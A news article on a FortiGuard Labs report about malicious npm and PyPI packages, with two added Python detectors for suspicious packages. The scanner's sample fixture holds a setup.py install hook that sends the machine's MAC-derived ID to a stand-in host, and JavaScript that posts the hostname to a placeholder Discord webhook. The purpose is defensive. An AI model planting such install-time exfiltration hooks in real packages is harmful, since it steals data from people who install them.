UPDATED 09:00 EDT / MARCH 10 2025

Fortinet identifies thousands of malicious software packages exploiting open-source repositories

A new report out today from Fortinet Inc.’s FortiGuard Labs highlights a growing wave of malicious software packages exploiting system vulnerabilities.

Based on data collected since November 2024, the report reveals sophisticated attack methods designed to evade detection, including low-file-count packages, suspicious installation scripts and typosquatting techniques.

FortiGuard Labs’ analysis identified thousands of malicious packages distributed across open-source repositories, using various techniques to compromise systems. The malicious packages identified included lightweight code designed to evade detection, scripts that execute malware upon installation and packages lacking repository URLs, making them harder to trace.

Attackers were also found to be embedding malicious URLs and leveraging application programming interfaces to exfiltrate data or enable remote control. Many of the packages were found to use deceptive tactics, such as artificially high version numbers and empty descriptions, to obscure their true intent and mislead users.

The research found that attackers often use low-file-count packages to bypass traditional security measures, deploying lightweight but harmful code. The packages frequently employ obfuscation and command overwrites, allowing attackers to execute malicious actions like data exfiltration and unauthorized system access without detection.

Another common attack vector, suspicious install scripts, was found to be used to stealthily introduce malicious code during the installation process. Some of the scripts modify installation procedures to establish persistence, while others leverage external APIs to communicate with attacker-controlled servers for data collection or further payload downloads.
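The indicators described above (low file count, install-time scripts, missing repository URL, empty description, inflated version number and typosquatting) can be combined into a simple triage score run over a package's metadata before it is installed. The following Python is an added example written for this article, not tooling from Fortinet or FortiGuard Labs; the metadata dicts, the popular-name list and the thresholds (two or fewer files, major version 50 or higher, a difflib similarity cutoff of 0.8) are constructed assumptions for illustration.

```python
import difflib
import re

# Constructed short list of well-known names; a real check would use the
# registry's own top-N list.
POPULAR_NAMES = ["requests", "lodash", "express", "numpy", "boto3"]

# npm lifecycle hooks that run arbitrary code at install time.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Constructed thresholds (assumptions; tune against your own package corpus).
MAX_TRIVIAL_FILES = 2       # "low-file-count" package
SUSPICIOUS_MAJOR = 50       # artificially high version number
TYPOSQUAT_CUTOFF = 0.8      # difflib similarity ratio


def typosquat_candidate(name, popular=POPULAR_NAMES, cutoff=TYPOSQUAT_CUTOFF):
    """Return the popular package this name closely resembles, or None.
    An exact match is the real package, not a typosquat."""
    if name in popular:
        return None
    matches = difflib.get_close_matches(name, popular, n=1, cutoff=cutoff)
    return matches[0] if matches else None


def score_package(meta):
    """Score one package's metadata (a package.json-like dict).
    Returns {'name', 'findings': {indicator: reason}, 'score'}."""
    findings = {}
    name = meta.get("name", "")
    files = meta.get("files") or []
    if len(files) <= MAX_TRIVIAL_FILES:
        findings["low_file_count"] = f"{len(files)} file(s) shipped"
    scripts = meta.get("scripts") or {}
    hooks = [h for h in INSTALL_HOOKS if h in scripts]
    if hooks:
        findings["install_script"] = "lifecycle hooks: " + ", ".join(hooks)
    if not meta.get("repository"):
        findings["missing_repository"] = "no repository URL"
    if not (meta.get("description") or "").strip():
        findings["empty_description"] = "no description"
    major = re.match(r"(\d+)", str(meta.get("version", "")))
    if major and int(major.group(1)) >= SUSPICIOUS_MAJOR:
        findings["inflated_version"] = f"major version {major.group(1)}"
    squat = typosquat_candidate(name)
    if squat:
        findings["typosquat"] = f"name resembles '{squat}'"
    return {"name": name, "findings": findings, "score": len(findings)}


# Constructed sample metadata; neither record describes a real package.
SUSPICIOUS_META = {
    "name": "lodahs",
    "version": "99.6.0",
    "description": "",
    "files": ["index.js"],
    "scripts": {"postinstall": "node index.js"},
    "repository": None,
}
BENIGN_META = {
    "name": "lodash",
    "version": "4.17.21",
    "description": "Utility library (constructed sample).",
    "files": ["index.js", "lib/a.js", "lib/b.js", "README.md", "LICENSE"],
    "scripts": {"test": "node test.js"},
    "repository": {"type": "git", "url": "https://example.invalid/lodash.git"},
}

if __name__ == "__main__":
    for meta in (SUSPICIOUS_META, BENIGN_META):
        result = score_package(meta)
        print(f"{result['name']}: score {result['score']}")
        for indicator, reason in result["findings"].items():
            print(f"  - {indicator}: {reason}")
```

The score is a triage signal rather than a verdict: plenty of legitimate packages ship a postinstall hook or omit a repository field, so a high score should route the package to review, not block it outright.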

Malicious packages were also found to frequently exploit APIs and external URLs to facilitate data theft or remote control of infected systems. Threat actors often embed disguised URLs or weaponized API calls, such as https.get and https.request, to exfiltrate sensitive information or establish connections to command-and-control infrastructure.

Multiple threats

Fortinet discovered multiple Python-based threats that exploit setup.py files to silently gather system details, such as MAC addresses and user credentials, before sending them to remote servers. Examples include AffineQuant-99.6 and amzn-aws-glue-ml-libs-python-6.1.5, which leverage these techniques to harvest sensitive data and potentially enable further attacks.

Additionally, malicious JavaScript-based scripts such as seller-admin-common_6.5.8 and xeno.dll_1.0.2 were found harvesting system information and exfiltrating it via Discord webhooks. Some of the variants included keylogging functions, allowing attackers to steal passwords and credit card details while maintaining remote access through backdoors, posing a significant security risk.
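Both the weaponized API calls mentioned earlier (https.get and https.request, Discord webhooks) and the setup.py behaviours described in this section (MAC address collection, network calls at install time, overridden install commands) can be surfaced by a content scan of a package's files before it is installed. The following Python is an added example, not Fortinet's detection logic; the indicator names, regexes and sample files (including the collector.invalid host and the placeholder webhook path) are constructed assumptions for illustration.

```python
import re


# File gating keeps the noisy rules scoped: a network call inside setup.py
# is an anomaly, the same call in application code usually is not.
def _is_setup_py(name):
    return name.endswith("setup.py")


def _is_py(name):
    return name.endswith(".py")


def _is_js(name):
    return name.endswith((".js", ".mjs", ".cjs"))


def _any(name):
    return True


# (indicator, file predicate, pattern); constructed for this example.
RULES = [
    ("setup_py_network", _is_setup_py,
     re.compile(r"\b(?:urllib\.request|requests\.(?:get|post)|socket\.socket)\b")),
    ("install_command_override", _is_setup_py,
     re.compile(r"""cmdclass\s*=\s*\{[^}]*['"]install['"]""")),
    ("mac_address_harvest", _is_py,
     re.compile(r"\buuid\.getnode\s*\(")),
    ("node_https_call", _is_js,
     re.compile(r"\bhttps\.(?:get|request)\s*\(")),
    ("discord_webhook", _any,
     re.compile(r"discord(?:app)?\.com/api/webhooks/", re.IGNORECASE)),
]


def scan_text(filename, text):
    """Return the indicator names whose rule applies to this file and matches."""
    return [name for name, applies, pattern in RULES
            if applies(filename) and pattern.search(text)]


def scan_package(files):
    """files maps relative path -> file contents. Returns only files with hits."""
    report = {}
    for path, text in files.items():
        hits = scan_text(path, text)
        if hits:
            report[path] = hits
    return report


# Constructed sample package contents (not a real package).
SAMPLE_PACKAGE = {
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "import uuid, urllib.request\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        install.run(self)\n"
        "        node_id = uuid.getnode()\n"
        "        urllib.request.urlopen('https://collector.invalid/?id=%s' % node_id)\n"
        "setup(name='example-pkg', version='6.1.5', cmdclass={'install': PostInstall})\n"
    ),
    "index.js": (
        "const https = require('https');\n"
        "const os = require('os');\n"
        "const body = JSON.stringify({ host: os.hostname() });\n"
        "// placeholder webhook path, constructed for the sample\n"
        "const req = https.request('https://discord.com/api/webhooks/0000/PLACEHOLDER', { method: 'POST' });\n"
        "req.end(body);\n"
    ),
    "utils.py": "def add(a, b):\n    return a + b\n",
    "README.md": "# example-pkg\n",
}

if __name__ == "__main__":
    for path, hits in scan_package(SAMPLE_PACKAGE).items():
        print(f"{path}: {', '.join(hits)}")
```

The node_https_call rule will fire on legitimate HTTP clients too, so in practice it is weighted low on its own and becomes interesting when it co-occurs with an exfiltration sink such as the webhook rule or with a lifecycle hook that runs the file at install time.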

Fortinet is urging organizations to implement strong security hygiene, including vetting open-source dependencies, utilizing threat intelligence solutions and applying behavioral analysis techniques to detect emerging malware threats.

Jason Soroko, senior fellow at certificate management company Sectigo Ltd., told SiliconANGLE via email that the report “suggests that attackers now favor lean, obfuscated packages that slip past traditional defense” and that “with low file counts, dubious install scripts and missing metadata, these threats exploit system vulnerabilities by cloaking harmful actions in minimal code and deceptive indicators.”

“When the attackers teach us something, we should listen,” added Soroko. “Conventional tools must adapt to detect subtle evasion techniques like command overwrites and typosquatting, while robust, adaptive defenses become critical in verifying software legitimacy amidst increasingly ambiguous threat landscapes.”

Image: SiliconANGLE/Ideogram
